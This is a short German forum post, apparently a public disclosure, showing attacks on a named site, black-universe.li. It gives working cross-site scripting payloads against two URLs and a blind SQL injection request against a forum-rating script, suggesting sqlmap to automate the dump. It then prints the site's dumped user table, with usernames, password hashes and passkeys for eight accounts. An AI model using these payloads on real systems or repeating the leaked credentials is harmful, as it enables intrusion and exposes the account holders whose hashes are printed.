An der Sicherheit sollte auch noch gearbeitet werden:
Code:http://www.black-universe.li/recover.php | POST: email=TEST"><script>alert(String.fromCharCode(88,83,83));</script>
Ebenfalls gibt es die möglichkeit SQL-Befehle zu injecten!Code:https://www.black-universe.li/coverurl.php?form="><script>alert(String.fromCharCode(88,83,83));</script>
Ist die SQL-Abfrage valid so erscheint diese Meldung:
Das ganze kann man dann noch automatisiert dumpen (Vorzugsweise mit sqlmap):Code:http://www.black-universe.li/forumstake.php?action=rate | POST: topicid=4&forumid=6&postid=(SELECT(CASE WHEN(ORD(MID((SELECT IFNULL(CAST(passhash AS CHAR ),0x20) FROM neu.users ORDER BY id LIMIT 0,1),32,1))NOT BETWEEN 0 AND 51)THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS)END))&userid=31&returnto=forums.php?action=viewtopic&topicid=4&page=p4#p4&rating=3
Code:Database: neu Table: users [8 entries] +----+-----------------+----------------------------------+-------------------------+ | id | username | passhash | passkey | +----+-----------------+----------------------------------+-------------------------+ | 1 | D@rk-Ripper\x99 | ca59f625d7c9fbd505f3f069e922f054 | Û\x95ÉIzwxú | | 24 | Loyd | 7e1734c6a4dcf3534f115b98a89f655d | íÛÃ\x8dâ3\r\x89 | | 25 | Warlock | 2858ec3ddc45c1c3cdb35c06c3c8a32f | #MöÛ3\x1fW¹ | | 26 | sumfl0w | 462ccbef5dc0734dada6806e739730cb | à¸\x92\x83\x15\x1dý\x95 | | 27 | BabyRay | 3d66eaf3ec5b8bb9f3dd145c1acc6793 | i:½qI\x8dgý | | 28 | ThaPUSHer | 93b91d70047a5e48fc15427b41f83aae | ÕÛ\x16ß_Ä.m | | 29 | hddude | ae35c2f5600ea1643d6ae20c4533c0df | ÁÁmô\x7fvM\x05 | | 31 | user123 | 36f561c263e02d142667f451871a34aa | ¡k/2{<P© | +----+-----------------+----------------------------------+-------------------------+
